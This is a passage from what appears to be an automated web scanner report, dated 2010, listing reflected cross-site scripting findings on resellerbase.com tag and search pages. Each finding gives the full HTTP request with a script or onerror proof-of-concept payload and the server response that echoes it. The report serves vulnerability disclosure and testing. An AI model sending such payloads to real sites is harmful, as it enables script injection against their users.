Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/ringtones
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9824

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: ringtones71f84</title><img src=a onerror=alert(1)>8c9bc4619f122c768</title>
...[SNIP]...

2.4381. http://www.resellerbase.com/tag/ringtones [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/ringtones

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 89042<img%20src%3da%20onerror%3dalert(1)>d7c574db726323b09 was submitted in the REST URL parameter 2. This input was echoed as 89042<img src=a onerror=alert(1)>d7c574db726323b09 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, but it was possible to convert it to a GET request, which makes the attack easier to demonstrate and deliver.

Request

GET /tag/ringtones89042<img%20src%3da%20onerror%3dalert(1)>d7c574db726323b09?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/ringtones
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9808

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: ringt
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : ringtones89042<img src=a onerror=alert(1)>d7c574db726323b09]</td>
...[SNIP]...

2.4382. http://www.resellerbase.com/tag/script [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/script

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bf97f<script>alert(1)</script>3f5b771c01e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tagbf97f<script>alert(1)</script>3f5b771c01e/script HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/pinnaclecart-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:57:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagbf97f<script>alert(1)</script>3f5b771c01e/script was not found on this server.</p>
...[SNIP]...

2.4383. http://www.resellerbase.com/tag/script [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/script

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 85016<script>alert(1)</script>90639d3111c314b44 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, but it was possible to convert it to a GET request, which makes the attack easier to demonstrate and deliver.

Request

GET /tag85016<script>alert(1)</script>90639d3111c314b44/script?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/script
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:58:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag85016<script>alert(1)</script>90639d3111c314b44/script?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4384. http://www.resellerbase.com/tag/script [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/script

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload deade<img%20src%3da%20onerror%3dalert(1)>8e42d3dc17f was submitted in the REST URL parameter 2. This input was echoed as deade<img src=a onerror=alert(1)>8e42d3dc17f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/scriptdeade<img%20src%3da%20onerror%3dalert(1)>8e42d3dc17f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/pinnaclecart-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9790

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: scrip
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : scriptdeade<img src=a onerror=alert(1)>8e42d3dc17f]</td>
...[SNIP]...

2.4385. http://www.resellerbase.com/tag/script [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/script

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload b9d92</title><img%20src%3da%20onerror%3dalert(1)>5e46d749343f33e61 was submitted in the REST URL parameter 2. This input was echoed as b9d92</title><img src=a onerror=alert(1)>5e46d749343f33e61 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/scriptb9d92</title><img%20src%3da%20onerror%3dalert(1)>5e46d749343f33e61?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/script
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9818

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: scriptb9d92</title><img src=a onerror=alert(1)>5e46d749343f33e61</title>
...[SNIP]...

2.4386. http://www.resellerbase.com/tag/script [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/script

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1edd4<img%20src%3da%20onerror%3dalert(1)>973447b3bec7e5c86 was submitted in the REST URL parameter 2. This input was echoed as 1edd4<img src=a onerror=alert(1)>973447b3bec7e5c86 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/script1edd4<img%20src%3da%20onerror%3dalert(1)>973447b3bec7e5c86?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/script
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: scrip
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : script1edd4<img src=a onerror=alert(1)>973447b3bec7e5c86]</td>
...[SNIP]...

2.4387. http://www.resellerbase.com/tag/script [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/script

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 51030</title><img%20src%3da%20onerror%3dalert(1)>f48f2788806 was submitted in the REST URL parameter 2. This input was echoed as 51030</title><img src=a onerror=alert(1)>f48f2788806 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/script51030</title><img%20src%3da%20onerror%3dalert(1)>f48f2788806 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/pinnaclecart-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9806

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: script51030</title><img src=a onerror=alert(1)>f48f2788806</title>
...[SNIP]...

2.4388. http://www.resellerbase.com/tag/search+engine+optimisation [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/search+engine+optimisation

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2d82f<script>alert(1)</script>c288383c7a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag2d82f<script>alert(1)</script>c288383c7a/search+engine+optimisation HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:58:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag2d82f<script>alert(1)</script>c288383c7a/search+engine+optimisation was not found on this server.</p>
...[SNIP]...

2.4389. http://www.resellerbase.com/tag/search+engine+optimization [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/search+engine+optimization

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3fa1c<script>alert(1)</script>1ce6e43499c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag3fa1c<script>alert(1)</script>1ce6e43499c/search+engine+optimization HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:58:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag3fa1c<script>alert(1)</script>1ce6e43499c/search+engine+optimization was not found on this server.</p>
...[SNIP]...

2.4390. http://www.resellerbase.com/tag/search+engine+submission [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/search+engine+submission

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4a402<script>alert(1)</script>583d5101fb7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag4a402<script>alert(1)</script>583d5101fb7/search+engine+submission HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/netapplications-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:59:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag4a402<script>alert(1)</script>583d5101fb7/search+engine+submission was not found on this server.</p>
...[SNIP]...

2.4391. http://www.resellerbase.com/tag/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f583d<script>alert(1)</script>165208d2f1c6b7651 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tagf583d<script>alert(1)</script>165208d2f1c6b7651/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:03:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagf583d<script>alert(1)</script>165208d2f1c6b7651/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4392. http://www.resellerbase.com/tag/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cddeb<script>alert(1)</script>3a90e58aa7a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tagcddeb<script>alert(1)</script>3a90e58aa7a/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/dropshipper
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:01:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagcddeb<script>alert(1)</script>3a90e58aa7a/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4393. http://www.resellerbase.com/tag/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9fc0b<img%20src%3da%20onerror%3dalert(1)>58d75d8bfa0 was submitted in the REST URL parameter 2. This input was echoed as 9fc0b<img src=a onerror=alert(1)>58d75d8bfa0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/search.php9fc0b<img%20src%3da%20onerror%3dalert(1)>58d75d8bfa0?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/dropshipper
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:01:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9798

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: searc
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : search.php9fc0b<img src=a onerror=alert(1)>58d75d8bfa0]</td>
...[SNIP]...

2.4394. http://www.resellerbase.com/tag/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 99243</title><img%20src%3da%20onerror%3dalert(1)>1b14a8ad562550975 was submitted in the REST URL parameter 2. This input was echoed as 99243</title><img src=a onerror=alert(1)>1b14a8ad562550975 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/search.php99243</title><img%20src%3da%20onerror%3dalert(1)>1b14a8ad562550975?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:03:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9826

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: search.php99243</title><img src=a onerror=alert(1)>1b14a8ad562550975</title>
...[SNIP]...

2.4395. http://www.resellerbase.com/tag/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2cd24<img%20src%3da%20onerror%3dalert(1)>9ba9a3b88066d07a0 was submitted in the REST URL parameter 2. This input was echoed as 2cd24<img src=a onerror=alert(1)>9ba9a3b88066d07a0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/search.php2cd24<img%20src%3da%20onerror%3dalert(1)>9ba9a3b88066d07a0?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:03:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9810

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: searc
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : search.php2cd24<img src=a onerror=alert(1)>9ba9a3b88066d07a0]</td>
...[SNIP]...

2.4396. http://www.resellerbase.com/tag/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 700a6</title><img%20src%3da%20onerror%3dalert(1)>b6dca1b5cae was submitted in the REST URL parameter 2. This input was echoed as 700a6</title><img src=a onerror=alert(1)>b6dca1b5cae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/search.php700a6</title><img%20src%3da%20onerror%3dalert(1)>b6dca1b5cae?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/dropshipper
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:01:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9814

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: search.php700a6</title><img src=a onerror=alert(1)>b6dca1b5cae</title>
...[SNIP]...

2.4397. http://www.resellerbase.com/tag/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload fdbd1<img%20src%3da%20onerror%3dalert(1)>608f8d056dd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fdbd1<img src=a onerror=alert(1)>608f8d056dd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/search.php/fdbd1<img%20src%3da%20onerror%3dalert(1)>608f8d056dd HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:55:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9800

